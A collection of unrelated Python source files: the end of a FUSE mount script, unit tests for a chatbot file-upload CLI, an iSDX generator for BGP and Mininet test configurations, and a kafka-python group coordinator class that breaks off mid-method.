parser.add_option("-f", "--foreground", action = "store_true", default = False)
options, arguments = parser.parse_args()
if options.verbose:
logging.getLogger().setLevel(logging.DEBUG)
logging.basicConfig()
if len(arguments) != 2:
parser.print_help()
return -1
f = fuse.FUSE(ApacheFuse(arguments[0]), arguments[1],
foreground = options.foreground,
encoding = "latin-1",
)
if __name__ == "__main__":
sys.exit(main())
|
|
import unittest
import subprocess
import json
import os
import util
import time
from TestConfig import *
config = {}
test_env = os.getenv('test_env', 'aiaas')
env_setup = TestConfig()
config = env_setup.setEnvironment(test_env)
cli = os.path.abspath('./pb-cli/index.js')
class TestPBUpload(unittest.TestCase):
@classmethod
def setUpClass(self):
self.util = util.TestUtil()
self.util.announce_test_block('pb upload')
self.hostname = config["hostname"]
print self.hostname
def setUp(self):
self.util.create_bot()
def test_upload_aiml(self):
self.util.it('successfully uploads an aiml file.')
bot_files = self.util.get_file_list()
self.assertFalse('test.aiml' in bot_files)
result = subprocess.Popen([
cli,
'upload',
'--app_id', config['appId'],
'--user_key', config['userKey'],
'--botname', config['botName'],
'--hostname', self.hostname,
os.path.abspath(os.path.dirname(__file__) + '/test_data/test.aiml')
],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
)
time.sleep(1)
bot_files = self.util.get_file_list()
self.assertTrue('test.aiml' in bot_files)
def test_upload_set(self):
self.util.it('successfully uploads a set file.')
bot_files = self.util.get_file_list()
self.assertFalse('test.set' in bot_files)
result = subprocess.Popen([
cli,
'upload',
'--app_id', config['appId'],
'--user_key', config['userKey'],
'--botname', config['botName'],
'--hostname', self.hostname,
os.path.abspath(os.path.dirname(__file__) + '/test_data/test.set')
],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
)
time.sleep(1)
bot_files = self.util.get_file_list()
self.assertTrue('test.set' in bot_files)
def test_upload_map(self):
self.util.it('successfully uploads a map file.')
bot_files = self.util.get_file_list()
self.assertFalse('test.map' in bot_files)
result = subprocess.Popen([
cli,
'upload',
'--app_id', config['appId'],
'--user_key', config['userKey'],
'--botname', config['botName'],
'--hostname', self.hostname,
os.path.abspath(os.path.dirname(__file__) + '/test_data/test.map')
],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
)
time.sleep(1)
bot_files = self.util.get_file_list()
self.assertTrue('test.map' in bot_files)
def test_map_failure(self):
self.util.it(['rejects files with invalid json', 'returns status 400.'])
result = subprocess.Popen([
cli,
'upload',
'--app_id', config['appId'],
'--user_key', config['userKey'],
'--botname', config['botName'],
'--hostname', self.hostname,
os.path.abspath(os.path.dirname(__file__) + '/test_data/invalid.map')
],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
)
time.sleep(1)
self.assertTrue('400' in result.stdout.read())
def test_upload_substitution(self):
self.util.it('successfully uploads a substitution file.')
bot_files = self.util.get_file_list()
self.assertFalse('test.substitution' in bot_files)
result = subprocess.Popen([
cli,
'upload',
'--app_id', config['appId'],
'--user_key', config['userKey'],
'--botname', config['botName'],
'--hostname', self.hostname,
os.path.abspath(os.path.dirname(__file__) + '/test_data/test.substitution')
],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
)
time.sleep(1)
bot_files = self.util.get_file_list()
self.assertTrue('test.substitution' in bot_files)
def test_upload_properties(self):
self.util.it('successfully uploads a properties file.')
result = subprocess.Popen([
cli,
'upload',
'--app_id', config['appId'],
'--user_key', config['userKey'],
'--botname', config['botName'],
'--hostname', self.hostname,
os.path.abspath(os.path.dirname(__file__) + '/test_data/test.properties')
],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
)
time.sleep(1)
self.util.download_file('testbot.properties')
with open(os.path.abspath(os.path.dirname(__file__) + '/test_data/test_output/testbot.properties')) as f:
f = json.load(f)
file_content = f
self.assertTrue(['name', 'Testbot'] in file_content)
self.util.delete_local_file('testbot.properties')
def test_upload_pdefaults(self):
self.util.it('successfully uploads a pdefaults file.')
bot_files = self.util.get_file_list()
try:
self.assertFalse('testbot.pdefaults' in bot_files)
except:
self.util.delete_file(filename='testbot.pdefaults')
time.sleep(1)
bot_files = self.util.get_file_list()
self.assertFalse('testbot.pdefaults' in bot_files)
result = subprocess.Popen([
cli,
'upload',
'--app_id', config['appId'],
'--user_key', config['userKey'],
'--botname', config['botName'],
'--hostname', self.hostname,
os.path.abspath(os.path.dirname(__file__) + '/test_data/test.pdefaults')
],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
)
time.sleep(1)
bot_files = self.util.get_file_list()
self.assertTrue('testbot.pdefaults' in bot_files)
self.util.delete_file(filename='testbot.pdefaults')
def test_invalid_botName(self):
self.util.it('returns 400 if the botname is invalid.')
result = subprocess.Popen([
cli, 'upload',
'--app_id', config['appId'],
'--user_key', config['userKey'],
'--botname', 'ABCDEFG',
'--hostname', self.hostname,
os.path.abspath(os.path.dirname(__file__) + '/test_data/test.aiml')
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
self.assertTrue('400' in result.stdout.read())
def test_bot_not_found(self):
self.util.it('returns 412 if the bot does not exist.')
result = subprocess.Popen([
cli, 'upload',
'--app_id', config['appId'],
'--user_key', config['userKey'],
'--botname', '123456',
'--hostname', self.hostname,
os.path.abspath(os.path.dirname(__file__) + '/test_data/test.aiml')
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
self.assertTrue('412' in result.stdout.read())
def test_invalid_userKey(self):
self.util.it('returns 401 if the user_key is invalid.')
result = subprocess.Popen([
cli, 'upload',
'--app_id', config['appId'],
'--user_key', '12345',
'--botname', config['botName'],
'--hostname', self.hostname,
os.path.abspath(os.path.dirname(__file__) + '/test_data/test.aiml')
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
self.assertTrue('401' in result.stdout.read())
def test_invalid_appId(self):
self.util.it('returns 401 if the app_id is invalid.')
result = subprocess.Popen([
cli, 'upload',
'--app_id', '12345',
'--user_key', config['userKey'],
'--botname', config['botName'],
'--hostname', self.hostname,
os.path.abspath(os.path.dirname(__file__) + '/test_data/test.aiml')
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
self.assertTrue('401' in result.stdout.read())
def tearDown(self):
self.util.delete_bot()
if __name__ == "__main__":
unittest.main()
|
|
'''
Created on Jan 18, 2016
@author: Marc Pucci (Vencore Labs)
'''
'''
Convert simple description into json policy definitions
participants are labeled from 'a' ... and correspond to 1 ...
ports (C1, C2) correspond to 0, 1, ... are router connections from name C1
create file with name 'participant_#.py where number runs from 1 to n (a - z)
'''
import sys
import json
import os
import shutil
import collections
import tlib # iSDX parser
noisy = False # print extra output for debugging
policies = {} # details on participant policies (flow rules)
bh_policies = {} # blackholing policies per participant
participants = {} # details on each participant
outdir = 'output' # base directory for results, will have XXXXX from XXXXX.spec added to it
template_dir = 'templates' # directory for templates for configurations
genmini = False # don't generate mininet sub directories for quagga
config = None # parsed configuration
def main (argv):
global outdir
if len(argv) < 2:
print 'usage: gen_test specification_file'
exit()
cfile = argv[1]
try:
config = tlib.parser(cfile)
except Exception, e:
print 'Configuration error: ' + cfile + ': ' + repr(e)
exit()
if config.portgap():
print '\n\nWARNING: There is a gap in the port numbering - this is known to break things\n\n'
participants = config.participants
policies = config.policies
bh_policies = config.bh_policies
sdx_mininet_template = os.path.join(template_dir, config.mode + '-sdx_mininet.py')
sdx_global_template = os.path.join(template_dir, config.mode + '-sdx_global.cfg')
# inbound and outbound rules are checked in global, not in policy files
for part in participants:
p = participants.get(part)
if len(policies[part]['inbound']) != 0:
p['Inbound Rules'] = True
else:
p['Inbound Rules'] = False
if len(policies[part]['outbound']) != 0:
p['Outbound Rules'] = True
else:
p['Outbound Rules'] = False
try:
b = os.path.basename(cfile)
s = b.split('.')
b = s[0]
outdir = os.path.join(outdir, b)
os.mkdir(outdir)
print 'Output will be in ' + outdir
except:
print 'Output directory ' + outdir + ' already exists or cannot be made'
exit()
mininet_dir = os.path.join(outdir, 'mininet')
os.mkdir(mininet_dir)
if genmini:
mininet_configs_dir = os.path.join(mininet_dir, 'configs')
os.mkdir(mininet_configs_dir)
config_dir = os.path.join(outdir, 'config')
os.mkdir(config_dir)
policies_dir = os.path.join(outdir, 'policies')
os.mkdir(policies_dir)
# config.spec file
dst_file = 'config.spec'
dst_file = os.path.join(config_dir, dst_file)
print 'copying ' + cfile + ' to ' + dst_file
shutil.copy(cfile, dst_file)
# README.md file
src_file = 'test-README.md'
src_file = os.path.join(template_dir, src_file)
dst_file = 'README.md'
dst_file = os.path.join(outdir, dst_file)
print 'generating ' + dst_file + ' from ' + src_file
fin = open(src_file)
fout = open(dst_file, 'w')
for line in fin:
if '_SPECFILE_' in line:
line = line.replace('_SPECFILE_', cfile)
dprint(line, fout)
continue
if '_SPECIFICATION_' in line:
f = open(cfile)
for l in f:
dprint(l.strip('\n'), fout)
f.close()
continue
dprint(line.rstrip('\n'), fout)
fin.close()
fout.close()
# sdx_mininet.py
dst_file = 'sdx_mininet.py'
dst_file = os.path.join(mininet_dir, dst_file)
print 'copying ' + sdx_mininet_template + ' to ' + dst_file
shutil.copy(sdx_mininet_template, dst_file)
# sdnip.py - one size fits all
dst_file = 'sdnip.py'
dst_file = os.path.join(mininet_dir, dst_file)
sdnip_template = os.path.join(template_dir, 'sdnip.py')
print 'copying ' + sdnip_template + ' to ' + dst_file
shutil.copy(sdnip_template, dst_file)
# per participant policy files (flow rules)
# policy file that includes these file names
sdx_policies = {}
for p in policies:
participant_file = 'participant_' + p + '.cfg'
dir_participant_file = os.path.join(policies_dir, participant_file)
print 'generating configuration file ' + dir_participant_file
# don't include empty inbound or outbound definitions (sigh)
if len(policies[p]['outbound']) == 0:
policies[p].pop('outbound')
if len(policies[p]['inbound']) == 0:
policies[p].pop('inbound')
if noisy:
print json.dumps(policies[p], indent=4, sort_keys=True)
with open(dir_participant_file,'w') as f:
json.dump(policies[p], f, indent=4, sort_keys=True)
sdx_policies[p] = participant_file
# generate blackholing policies
for p in bh_policies:
participant_file = 'participant_' + p + '_bh.cfg'
dir_participant_file = os.path.join(policies_dir, participant_file)
print 'generating configuration file ' + dir_participant_file
# don't include empty inbound or outbound definitions (sigh)
if len(bh_policies[p]['outbound']) == 0:
bh_policies[p].pop('outbound')
if len(bh_policies[p]['inbound']) == 0:
bh_policies[p].pop('inbound')
if noisy:
print json.dumps(bh_policies[p], indent=4, sort_keys=True)
with open(dir_participant_file,'w') as f:
json.dump(bh_policies[p], f, indent=4, sort_keys=True)
policy_file = 'sdx_policies.cfg'
policy_file = os.path.join(config_dir, policy_file)
print "generating policy file " + policy_file
if noisy:
print json.dumps(sdx_policies, indent=4, sort_keys=True)
with open(policy_file,'w') as f:
json.dump(sdx_policies, f, indent=4, sort_keys=True)
# Fine Tune Participants
for p in sorted(participants):
part = participants[p]
part['Flanc Key'] = 'Part' + p + 'Key'
part['ASN'] = int(part['ASN'])
if noisy:
print json.dumps(participants, indent=4, sort_keys=True)
# sdx_global.cfg
dst_file = 'sdx_global.cfg'
dst_file = os.path.join(config_dir, dst_file)
print 'creating ' + dst_file + ' from ' + sdx_global_template
fin = open(sdx_global_template)
gc = json.load(fin)
fin.close
gc['Participants'] = participants
for p in sorted(participants):
if config.mode != 'multi-hop':
ports = []
for r in participants[p]['Ports']: # routers
ports.append(r['Id'])
#print ports
if len(ports) == 1:
gc['RefMon Settings']['fabric connections']['main'][p] = ports[0]
else:
gc['RefMon Settings']['fabric connections']['main'][p] = ports
else:
# Fabric connections are already defined in the template
pass
# there are refmon settings for the fabric that assign the next port, but it doesn't seem to be used
with open(dst_file,'w') as f:
json.dump(gc, f, indent=4, sort_keys=True)
# quagga
quagga = {}
for p in participants:
for r in participants[p]['Ports']: # routers
# print r
q = {}
q['ip'] = r['NET']
q['mac'] = r['MAC']
q['port'] = r['Id'] #switch port
if config.mode == 'multi-hop':
q['switch']= r['switch']
q['networks'] = participants[p]['networks']
q['announcements'] = participants[p]['announcements']
netnames = []
for netnumb in range(len(q['networks'])):
netnames.append(config.genname(netnumb, q['networks'][netnumb], tlib.part2as(p), r['index']))
q['netnames'] = netnames
q['asn'] = participants[p]['ASN']
# convert participant + index into a1, b1, c1, c2, etc.
hostname = tlib.part_router2host(p, r['index'])
# cmds.append('sudo python tnode.py ' + hostname) # handle in sdx_mininet.py to simplify finding tnode.py
quagga[hostname] = q
mininet_file = 'mininet.cfg'
mininet_file = os.path.join(mininet_dir, mininet_file)
print 'generating mininet configuration file ' + mininet_file
if noisy:
print json.dumps(quagga, indent=4, sort_keys=True)
with open(mininet_file,'w') as f:
json.dump(quagga, f, indent=4, sort_keys=True)
# exabgp bgp.conf file
'''
neighbor 172.0.0.22 {
description "Virtual AS C Router C2";
router-id 172.0.255.254;
local-address 172.0.255.254;
local-as 65000;
peer-as 300;
hold-time 180;
}
'''
src_exabgp_file = 'exabgp-bgp.conf'
src_exabgp_file = os.path.join(template_dir, src_exabgp_file)
dst_exabgp_file = 'bgp.conf'
dst_exabgp_file = os.path.join(config_dir, dst_exabgp_file)
print 'generating exabgp bgp.conf configuration file ' + dst_exabgp_file + ' using ' + src_exabgp_file
fin = open(src_exabgp_file)
fout = open(dst_exabgp_file, 'w')
for line in fin:
if '_NEIGHBORS_' not in line:
dprint(line.rstrip('\n'), fout)
continue
for part in sorted(participants):
p = participants[part]
for r in p['Ports']: # routers
dprint('\n\tneighbor ' + r['IP'].split('/')[0] + ' {', fout)
dprint('\t\tdescription "' + r['description'] + '";', fout)
dprint('\t\trouter-id 172.0.255.254;', fout)
dprint('\t\tlocal-address 172.0.255.254;', fout)
dprint('\t\tlocal-as 65000;', fout)
dprint('\t\tpeer-as ' + str(p['ASN']) + ';', fout)
dprint('\t\thold-time 180;', fout)
dprint('\t}', fout)
fin.close()
fout.close()
if not genmini:
return
# quagga bgpd.conf file
'''
!
! Zebra configuration saved from vty
! 2013/10/02 20:47:51
!
hostname Virtual-AS-A
password bgpd
log stdout
!
router bgp 100
bgp router-id 172.0.0.1
neighbor 172.0.255.254 remote-as 65000
neighbor 172.0.255.254 next-hop-self
network 100.0.0.0/24
network 110.0.0.0/24
redistribute static
!
line vty
!
'''
for part in sorted(participants):
p = participants[part]
for r in p['Ports']: # routers
mininet_configs_host_dir = os.path.join(mininet_configs_dir, r['hostname'])
os.mkdir(mininet_configs_host_dir)
src_quagga_file = 'quagga-bgpd.conf'
dst_quagga_file = 'bgpd.conf'
dst_quagga_file = os.path.join(mininet_configs_host_dir, dst_quagga_file)
src_quagga_file = os.path.join(template_dir, src_quagga_file)
print 'generating quagga bgpd.conf configuration file ' + dst_quagga_file + ' using ' + src_quagga_file
fin = open(src_quagga_file)
fout = open(dst_quagga_file, 'w')
for line in fin:
if '_NETWORKS_' in line:
for a in p['announce']:
dprint(' network ' + a, fout)
continue
if '_ASN_' in line:
line = line.replace('_ASN_', str(p['ASN']))
dprint(line, fout)
continue
if '_DESCRIPTION_' in line:
line = line.replace('_DESCRIPTION_', r['description'].replace(' ', '-'))
dprint(line, fout)
continue
if '_IP_' in line:
line = line.replace('_IP_', r['IP'])
dprint(line, fout)
continue
dprint(line.rstrip('\n'), fout)
fin.close()
fout.close()
# zebra
src_quagga_file = 'quagga-zebra.conf'
dst_quagga_file = 'zebra.conf'
dst_quagga_file = os.path.join(mininet_configs_host_dir, dst_quagga_file)
src_quagga_file = os.path.join(template_dir, src_quagga_file)
print 'generating quagga zebra.conf configuration file ' + dst_quagga_file + ' using ' + src_quagga_file
fin = open(src_quagga_file)
fout = open(dst_quagga_file, 'w')
for line in fin:
if '_HOSTNAME_' in line:
line = line.replace('_HOSTNAME_', r['description'].replace(' ', '-'))
dprint(line, fout)
continue
if '_HOST_' in line:
line = line.replace('_HOST_', r['hostname'])
dprint(line, fout)
continue
dprint(line.rstrip('\n'), fout)
fin.close()
fout.close()
copylist = ( ('quagga-daemons', 'daemons'),
('quagga-debian.conf', 'debian.conf')
)
for c in copylist:
src_file = os.path.join(template_dir, c[0])
dst_file = os.path.join(mininet_configs_host_dir, c[1])
print 'copying ' + src_file + ' to ' + dst_file
shutil.copy(src_file, dst_file)
def dprint (line, fout):
if noisy:
print line
fout.write(line + '\n')
if __name__ == "__main__":
main(sys.argv)
|
|
import abc
import copy
import logging
import time
import six
import kafka.common as Errors
from kafka.future import Future
from kafka.protocol.commit import (GroupCoordinatorRequest,
OffsetCommitRequest_v2 as OffsetCommitRequest)
from kafka.protocol.group import (HeartbeatRequest, JoinGroupRequest,
LeaveGroupRequest, SyncGroupRequest)
from .heartbeat import Heartbeat
log = logging.getLogger('kafka.coordinator')
class BaseCoordinator(object):
"""
BaseCoordinator implements group management for a single group member
by interacting with a designated Kafka broker (the coordinator). Group
semantics are provided by extending this class. See ConsumerCoordinator
for example usage.
From a high level, Kafka's group management protocol consists of the
following sequence of actions:
1. Group Registration: Group members register with the coordinator providing
their own metadata (such as the set of topics they are interested in).
2. Group/Leader Selection: The coordinator select the members of the group
and chooses one member as the leader.
3. State Assignment: The leader collects the metadata from all the members
of the group and assigns state.
4. Group Stabilization: Each member receives the state assigned by the
leader and begins processing.
To leverage this protocol, an implementation must define the format of
metadata provided by each member for group registration in group_protocols()
and the format of the state assignment provided by the leader in
_perform_assignment() and which becomes available to members in
_on_join_complete().
"""
DEFAULT_CONFIG = {
'group_id': 'kafka-python-default-group',
'session_timeout_ms': 30000,
'heartbeat_interval_ms': 3000,
'retry_backoff_ms': 100,
}
def __init__(self, client, **configs):
"""
Keyword Arguments:
group_id (str): name of the consumer group to join for dynamic
partition assignment (if enabled), and to use for fetching and
committing offsets. Default: 'kafka-python-default-group'
session_timeout_ms (int): The timeout used to detect failures when
using Kafka's group managementment facilities. Default: 30000
heartbeat_interval_ms (int): The expected time in milliseconds
between heartbeats to the consumer coordinator when using
Kafka's group management feature. Heartbeats are used to ensure
that the consumer's session stays active and to facilitate
rebalancing when new consumers join or leave the group. The
value must be set lower than session_timeout_ms, but typically
should be set no higher than 1/3 of that value. It can be
adjusted even lower to control the expected time for normal
rebalances. Default: 3000
retry_backoff_ms (int): Milliseconds to backoff when retrying on
errors. Default: 100.
"""
self.config = copy.copy(self.DEFAULT_CONFIG)
for key in self.config:
if key in configs:
self.config[key] = configs[key]
self._client = client
self.generation = OffsetCommitRequest.DEFAULT_GENERATION_ID
self.member_id = JoinGroupRequest.UNKNOWN_MEMBER_ID
self.group_id = self.config['group_id']
self.coordinator_id = None
self.rejoin_needed = True
self.needs_join_prepare = True
self.heartbeat = Heartbeat(**self.config)
self.heartbeat_task = HeartbeatTask(self)
#self.sensors = GroupCoordinatorMetrics(metrics, metric_group_prefix, metric_tags)
@abc.abstractmethod
def protocol_type(self):
"""
Unique identifier for the class of protocols implements
(e.g. "consumer" or "connect").
Returns:
str: protocol type name
"""
pass
@abc.abstractmethod
def group_protocols(self):
"""Return the list of supported group protocols and metadata.
This list is submitted by each group member via a JoinGroupRequest.
The order of the protocols in the list indicates the preference of the
protocol (the first entry is the most preferred). The coordinator takes
this preference into account when selecting the generation protocol
(generally more preferred protocols will be selected as long as all
members support them and there is no disagreement on the preference).
Note: metadata must be type bytes or support an encode() method
Returns:
list: [(protocol, metadata), ...]
"""
pass
@abc.abstractmethod
def _on_join_prepare(self, generation, member_id):
"""Invoked prior to each group join or rejoin.
This is typically used to perform any cleanup from the previous
generation (such as committing offsets for the consumer)
Arguments:
generation (int): The previous generation or -1 if there was none
member_id (str): The identifier of this member in the previous group
or '' if there was none
"""
pass
@abc.abstractmethod
def _perform_assignment(self, leader_id, protocol, members):
"""Perform assignment for the group.
This is used by the leader to push state to all the members of the group
(e.g. to push partition assignments in the case of the new consumer)
Arguments:
leader_id (str): The id of the leader (which is this member)
protocol (str): the chosen group protocol (assignment strategy)
members (list): [(member_id, metadata_bytes)] from
JoinGroupResponse. metadata_bytes are associated with the chosen
group protocol, and the Coordinator subclass is responsible for
decoding metadata_bytes based on that protocol.
Returns:
dict: {member_id: assignment}; assignment must either be bytes
or have an encode() method to convert to bytes
"""
pass
@abc.abstractmethod
def _on_join_complete(self, generation, member_id, protocol,
member_assignment_bytes):
"""Invoked when a group member has successfully joined a group.
Arguments:
generation (int): the generation that was joined
member_id (str): the identifier for the local member in the group
protocol (str): the protocol selected by the coordinator
member_assignment_bytes (bytes): the protocol-encoded assignment
propagated from the group leader. The Coordinator instance is
responsible for decoding based on the chosen protocol.
"""
pass
def coordinator_unknown(self):
"""Check if we know who the coordinator is and have an active connection
Side-effect: reset coordinator_id to None if connection failed
Returns:
bool: True if the coordinator is unknown
"""
if self.coordinator_id is None:
return True
if self._client.is_disconnected(self.coordinator_id):
self.coordinator_dead()
return True
return not self._client.ready(self.coordinator_id)
def ensure_coordinator_known(self):
"""Block until the coordinator for this group is known
(and we have an active connection -- java client uses unsent queue).
"""
while self.coordinator_unknown():
# Dont look for a new coordinator node if we are just waiting
# for connection to finish
if self.coordinator_id is not None:
self._client.poll()
continue
future = self._send_group_metadata_request()
self._client.poll(future=future)
if future.failed():
if future.retriable():
metadata_update = self._client.cluster.request_update()
self._client.poll(future=metadata_update)
else:
raise future.exception # pylint: disable-msg=raising-bad-type
def need_rejoin(self):
"""Check whether the group should be rejoined (e.g. if metadata changes)
Returns:
bool: True if it should, False otherwise
"""
return self.rejoin_needed
def ensure_active_group(self):
"""Ensure that the group is active (i.e. joined and synced)"""
if not self.need_rejoin():
return
if self.needs_join_prepare:
self._on_join_prepare(self.generation, self.member_id)
self.needs_join_prepare = False
while self.need_rejoin():
self.ensure_coordinator_known()
future = self._perform_group_join()
self._client.poll(future=future)
if future.succeeded():
member_assignment_bytes = future.value
self._on_join_complete(self.generation, self.member_id,
self.protocol, member_assignment_bytes)
self.needs_join_prepare = True
self.heartbeat_task.reset()
else:
assert future.failed()
exception = future.exception
if isinstance(exception, (Errors.UnknownMemberIdError,
Errors.RebalanceInProgressError,
Errors.IllegalGenerationError)):
continue
elif not future.retriable():
raise exception # pylint: disable-msg=raising-bad-type
time.sleep(self.config['retry_backoff_ms'] / 1000.0)
def _perform_group_join(self):
"""Join the group and return the assignment for the next generation.
This function handles both JoinGroup and SyncGroup, delegating to
_perform_assignment() if elected leader by the coordinator.
Returns:
Future: resolves to the encoded-bytes assignment returned from the
group leader
"""
if self.coordinator_unknown():
e = Errors.GroupCoordinatorNotAvailableError(self.coordinator_id)
return Future().failure(e)
# send a join group request to the coordinator
log.debug("(Re-)joining group %s", self.group_id)
request = JoinGroupRequest(
self.group_id,
self.config['session_timeout_ms'],
self.member_id,
self.protocol_type(),
[(protocol,
metadata if isinstance(metadata, bytes) else metadata.encode())
for protocol, metadata in self.group_protocols()])
# create the request for the coordinator
log.debug("Issuing request (%s) to coordinator %s", request, self.coordinator_id)
future = Future()
_f = self._client.send(self.coordinator_id, request)
_f.add_callback(self._handle_join_group_response, future)
_f.add_errback(self._failed_request, self.coordinator_id,
request, future)
return future
def _failed_request(self, node_id, request, future, error):
log.error('Error sending %s to node %s [%s] -- marking coordinator dead',
request.__class__.__name__, node_id, error)
self.coordinator_dead()
future.failure(error)
def _handle_join_group_response(self, future, response):
error_type = Errors.for_code(response.error_code)
if error_type is Errors.NoError:
self.member_id = response.member_id
self.generation = response.generation_id
self.rejoin_needed = False
self.protocol = response.group_protocol
log.info("Joined group '%s' (generation %s) with member_id %s",
self.group_id, self.generation, self.member_id)
#self.sensors.join_latency.record(response.requestLatencyMs())
if response.leader_id == response.member_id:
log.info("Elected group leader -- performing partition"
" assignments using %s", self.protocol)
self._on_join_leader(response).chain(future)
else:
self._on_join_follower().chain(future)
elif error_type is Errors.GroupLoadInProgressError:
log.debug("Attempt to join group %s rejected since coordinator is"
" loading the group.", self.group_id)
# backoff and retry
future.failure(error_type(response))
elif error_type is Errors.UnknownMemberIdError:
# reset the member id and retry immediately
error = error_type(self.member_id)
self.member_id = JoinGroupRequest.UNKNOWN_MEMBER_ID
log.info("Attempt to join group %s failed due to unknown member id,"
" resetting and retrying.", self.group_id)
future.failure(error)
elif error_type in (Errors.GroupCoordinatorNotAvailableError,
Errors.NotCoordinatorForGroupError):
# re-discover the coordinator and retry with backoff
self.coordinator_dead()
log.info("Attempt to join group %s failed due to obsolete "
"coordinator information, retrying.", self.group_id)
future.failure(error_type())
elif error_type in (Errors.InconsistentGroupProtocolError,
Errors.InvalidSessionTimeoutError,
Errors.InvalidGroupIdError):
# log the error and re-throw the exception
error = error_type(response)
log.error("Attempt to join group %s failed due to: %s",
self.group_id, error)
future.failure(error)
elif error_type is Errors.GroupAuthorizationFailedError:
future.failure(error_type(self.group_id))
else:
# unexpected error, throw the exception
error = error_type()
log.error("Unexpected error in join group response: %s", error)
future.failure(error)
def _on_join_follower(self):
# send follower's sync group with an empty assignment
request = SyncGroupRequest(
self.group_id,
self.generation,
self.member_id,
{})
log.debug("Issuing follower SyncGroup (%s) to coordinator %s",
request, self.coordinator_id)
return self._send_sync_group_request(request)
def _on_join_leader(self, response):
"""
Perform leader synchronization and send back the assignment
for the group via SyncGroupRequest
Arguments:
response (JoinResponse): broker response to parse
Returns:
Future: resolves to member assignment encoded-bytes
"""
try:
group_assignment = self._perform_assignment(response.leader_id,
response.group_protocol,
response.members)
except Exception as e:
return Future().failure(e)
request = SyncGroupRequest(
self.group_id,
self.generation,
self.member_id,
[(member_id,
assignment if isinstance(assignment, bytes) else assignment.encode())
for member_id, assignment in six.iteritems(group_assignment)])
log.debug("Issuing leader SyncGroup (%s) to coordinator %s",
request, self.coordinator_id)
return self._send_sync_group_request(request)
def _send_sync_group_request(self, request):
if self.coordinator_unknown():
return Future().failure(Errors.GroupCoordinatorNotAvailableError())
future = Future()
_f = self._client.send(self.coordinator_id, request)
_f.add_callback(self._handle_sync_group_response, future)
_f.add_errback(self._failed_request, self.coordinator_id,
request, future)
return future
def _handle_sync_group_response(self, future, response):
error_type = Errors.for_code(response.error_code)
if error_type is Errors.NoError:
log.debug("Received successful sync group response for group %s: %s",
self.group_id, response)
#self.sensors.syncLatency.record(response.requestLatencyMs())
future.success(response.member_assignment)
return
# Always rejoin on error
self.rejoin_needed = True
if error_type is Errors.GroupAuthorizationFailedError:
future.failure(error_type(self.group_id))
elif error_type is Errors.RebalanceInProgressError:
log.info("SyncGroup for group %s failed due to coordinator"
" rebalance, rejoining the group", self.group_id)
future.failure(error_type(self.group_id))
elif error_type in (Errors.UnknownMemberIdError,
Errors.IllegalGenerationError):
error = error_type()
log.info("SyncGroup for group %s failed due to %s,"
" rejoining the group", self.group_id, error)
self.member_id = JoinGroupRequest.UNKNOWN_MEMBER_ID
future.failure(error)
elif error_type in (Errors.GroupCoordinatorNotAvailableError,
Errors.NotCoordinatorForGroupError):
error = error_type()
log.info("SyncGroup for group %s failed due to %s, will find new"
" coordinator and rejoin", self.group_id, error)
self.coordinator_dead()
future.failure(error)
else:
error = error_type()
log.error("Unexpected error from SyncGroup: %s", error)
future.failure(error)
def _send_group_metadata_request(self):
"""Discover the current coordinator for the group.
Returns:
Future: resolves to the node id of the coordinator
"""
node_id = self._client.least_loaded_node()
if node_id is None or not self._client.ready(node_id):
return Future().failure(Errors.NoBrokersAvailable())
log.debug("Issuing group metadata request to broker %s", node_id)
request = GroupCoordinatorRequest(self.group_id)
future = Future()
_f = self._client.send(node_id, request)
_f.add_callback(self._handle_group_coordinator_response, future)
_f.add_errback(self._failed_request, node_id, request, future)
return future
def _handle_group_coordinator_response(self, future, response):
log.debug("Group metadata response %s", response)
if not self.coordinator_unknown():
# We already found the coordinator, so ignore the request
log.debug("Coordinator already known -- ignoring metadata response")
future.success(self.coordinator_id)
return
error_type = Errors.for_code(response.error_code)
if error_type is Errors.NoError:
ok = self._client.cluster.add_group_coordinator(self.group_id, response)
if not ok:
# This could happen if coordinator metadata is different
# than broker metadata
future.failure(Errors.IllegalStateError())
return
self.coordinator_id = response.coordinator_id
self._client.ready(self.coordinator_id)
# start sending heartbeats only if we have a valid generation
if self.generation > 0:
self.heartbeat_task.reset()
future.success(self.coordinator_id)
elif error_type is Errors.GroupCoordinatorNotAvailableError:
log.debug("Group Coordinator Not Available; retry")
future.failure(error_type())
elif error_type is Errors.GroupAuthorizationFailedError:
error = error_type(self.group_id)
log.error("Group Coordinator Request failed: %s", error)
future.failure(error)
else:
error = error_type()
log.error("Unrecognized failure in Group Coordinator Request: %s",
error)
future.failure(error)
def coordinator_dead(self, error=None):
"""Mark the current coordinator as dead."""
if self.coordinator_id is not None:
log.info("Marking the coordinator dead (node %s): %s.",
self.coordinator_id, error)
self.coordinator_id = None
def close(self):
"""Close the coordinator, leave the current group
and reset local generation/memberId."""
try:
self._client.unschedule(self.heartbeat_task)
except KeyError:
pass
if not self.coordinator_unknown() and self.generation > 0:
# this is a minimal effort attempt to leave the group. we do not
# attempt any resending if the request fails or times out.
request = LeaveGroupRequest(self.group_id, self.member_id)
future = self._client.send(self.coordinator_id, request)
future.add_callback(self._handle_leave_group_response)
future.add_errback(log.error, "LeaveGroup request failed: %s")
self._client.poll(future=future)
self.generation = OffsetCommitRequest.DEFAULT_GENERATION_ID
self.member_id = JoinGroupRequest.UNKNOWN_MEMBER_ID
self.rejoin_needed = True
def _handle_leave_group_response(self, response):
error_type = Errors.for_code(response.error_code)
if error_type is Errors.NoError:
log.info("LeaveGroup request succeeded")
else:
log.error("LeaveGroup request failed: %s", error_type())
def _send_heartbeat_request(self):
"""Send a heartbeat request"""
request = HeartbeatRequest(self.group_id, self.generation, self.member_id)
log.debug("Heartbeat: %s[%s] %s", request.group, request.generation_id, request.member_id) #pylint: disable-msg=no-member
future = Future()
_f = self._client.send(self.coordinator_id, request)
